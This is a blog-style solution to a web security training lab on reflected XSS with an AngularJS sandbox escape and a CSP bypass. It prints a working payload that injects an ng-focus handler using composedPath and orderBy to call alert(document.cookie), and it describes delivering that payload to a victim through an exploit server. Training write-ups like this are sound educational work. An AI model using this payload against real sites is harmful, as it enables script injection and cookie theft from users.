You are currently viewing Reflected XSS with AngularJS sandbox escape and CSP

Reflected XSS with AngularJS sandbox escape and CSP

introduction to Reflected XSS with AngularJS sandbox escape and CSP

Cross-Site Scripting (XSS) with reflected AngularJS sandbox escape and Content Security Policy (CSP) is a web security vulnerability where untrusted user input is not properly sanitized or validated. The AngularJS framework’s built-in sandbox aims to prevent XSS attacks, but if the application fails to validate or sanitize user input, an attacker can exploit vulnerabilities to bypass the sandbox and execute arbitrary scripts. To mitigate this vulnerability, web developers should implement secure coding practices, conduct thorough input validation and output encoding, and enforce a strict Content Security Policy. Prioritizing web security, staying informed about AngularJS security updates, regularly reviewing and updating the Content Security Policy, and conducting security assessments can help reduce the risk of XSS vulnerabilities and maintain a secure online environment.

Lab Solutions | Practical Work Time XSS with AngularJS

This lab uses CSP and AngularJS.

To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.

Stepwise Solution of the lab:-

After accessing this lab, we first noticed an option named Go to exploit server.

Click on Go to exploit server.

Without any further ado, write the below payload. 

<script>
location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>

Keep in mind that you’ve to replace YOUR-LAB-ID. So yeah, copy it from the lab URL, it will look such as 0aff00f00348ec23807c081800ec00c0.

Then just click Store and Deliver exploit to victim.
BOOM! The lab has been solved successfully.

Be ready for its other parts 🙂

I hope you had loved reading this article after you had completed this article we highly recommend you to study the next article: Reflected XSS protected by very strict CSP, with dangling markup attack, please don’t forget to leave a comment over here and share it with your friends as well, Good Luck!

Thank you for reading, if this article really helps you then do share it with your mates.
And follow @masaudsec on Twitter.

FAQS

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.

Leave a Reply